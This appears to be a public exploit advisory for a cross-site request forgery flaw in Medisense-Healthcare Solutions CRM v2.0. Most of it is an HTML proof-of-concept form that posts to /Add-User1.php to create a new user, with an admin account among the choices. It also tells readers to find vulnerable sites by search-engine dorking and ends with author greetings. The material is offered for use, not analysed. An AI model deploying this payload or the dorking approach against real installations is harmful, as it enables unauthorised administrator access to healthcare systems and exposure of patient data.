Authored by indoushka

Medisense-Healthcare Solutions CRM version 2.0 suffers from a cross site request forgery vulnerability.

====================================================================================================================================
| # Title : Medisense-Healthcare Solutions CRM v2.0 CSRF Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit) |
| # Vendor : https://medisensecrm.com |
| # Dork : |
====================================================================================================================================

poc :


[+] Dorking İn Google Or Other Search Enggine.

[+] The following html code create a new admin .

[+] infected file : /Add-User1.php .

[+] save code as poc.html .

<h2>Add New User</h2>
<form name="frmCreateuser" method="POST" action="https://127.0.0.1/medisensecrmcom/Add-User1.php" onsubmit="return createUser()">
<h3>User Name :<input type="text" name="txtuser" class="txtfield fr"/></h3>
<h3>Password :<input type="password" name="txtNewPass" class="txtfield fr"/></h3>
<h3>Re-type Password :<input type="password" name="txtVerifyPass" class="txtfield fr"/></h3>
<h3>USer Type:<label class="fr" ><input type="radio" name="usertype" class="rdBtn fr" value="1" checked/>Executive</label><br><label class="fr">
<input type="radio" name="usertype" value="0" class="rdBtn fr"/>Admin</label></h3>
<input type="submit" name="cmdSubmit" value="SUBMIT" class="submitBtn" />
</div>
</form>

</div>

</div>

Greetings to :=========================================================================================================================
|
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* |
|
=======================================================================================================================================